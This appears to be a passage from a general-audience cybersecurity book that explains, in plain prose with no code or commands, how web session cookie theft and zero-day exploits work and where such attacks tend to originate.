Web Session Cookie Thef

Authentication cookies are used by almost every website we use, including social media platforms, cloud services, financial apps, and streaming services. While cookies provide a great deal to enhance our online experience, they also present a vulnerability that can be used maliciously. In late 2019, a loosely connected group of hackers became well-known for taking over various YouTube channels with cookie-stealing software. After that, they conned the owners into thinking they could sell the accounts to the highest bidder or broadcast bitcoin frauds.

What you should know is that any activity the original user is permitted to do can be carried out by an attacker who has successfully stolen a session cookie. Organizations face a risk when cookies are used to identify verified users in single sign-on systems. This could allow the attacker to access every web application the victim can use, including financial systems, customer information, and line-of-business systems that might contain sensitive intellectual property.

The way the attack works is that a cookie is left on a user’s computer for a longer amount of time after they access a service and verify their identity. This keeps them from having to log in repeatedly. In order to utilize a website or application as the user for as long as the session cookie is active, malicious actors can use malware to steal web session cookies. They can then import the cookie into a browser under their control. An opponent can access confidential data, read emails, and carry out operations that the victim’s account is authorized to carry out once they have gained access to the website.

Where the attack originates:
Malware that copies the victim’s cookies and transmits them straight to the attacker is frequently used to steal cookies. There are several methods discussed in this book that can lead to the malware getting into the victim’s computer, including phishing, macro viruses, cross-site scripting, and more. Many of the hackers involved in cookie stealing are part of bigger networks with headquarters in China and Russia. For instance, it was discovered that the perpetrators of the YouTube attack were a part of a hacking organization that communicated via a forum with a Russian-speaking membership.

Zero-Day Exploit

It should come as no surprise that the quantity of zero-day defects is rising. However, 2021 completely eclipsed the previous years, with malicious actors taking advantage of 58 new zero-day threats, as opposed to just 25 vulnerabilities in 2020 and 21 vulnerabilities in 2019. The stakes are undoubtedly rising as vital systems get increasingly interconnected. Hackers have compromised Microsoft servers and installed sophisticated spyware on cellphones in recent years in order to conduct espionage operations against human rights activists, journalists, and politicians using zero day assault threats.

What you should know: A zero-day vulnerability is fundamentally a weakness. The word “zero” refers to the window of time on the same day that these vulnerabilities are exploited. It is a flaw in software or a computer network that hackers exploit soon after it is made available for public usage.

How the attack occurs: When a vulnerability is exploited, a zero-day assault takes place. Although the attack’s methodology will vary depending on the vulnerability, zero-day assaults have a consistent pattern. The hacker (or groups of hackers working together) first looks for vulnerabilities in the code base. They write code that takes advantage of the vulnerability as soon as they discover it. They use one or more of the techniques covered in this book to break into the system, insert their malicious code, and then start the exploit.

Where the attack originates:
Because technology is so widely used, zero-day assaults have increased dramatically. Although these attacks seem to be conducted from any location, they are frequently spread by nation-states or areas with substantial cyber-underground networks and infrastructure.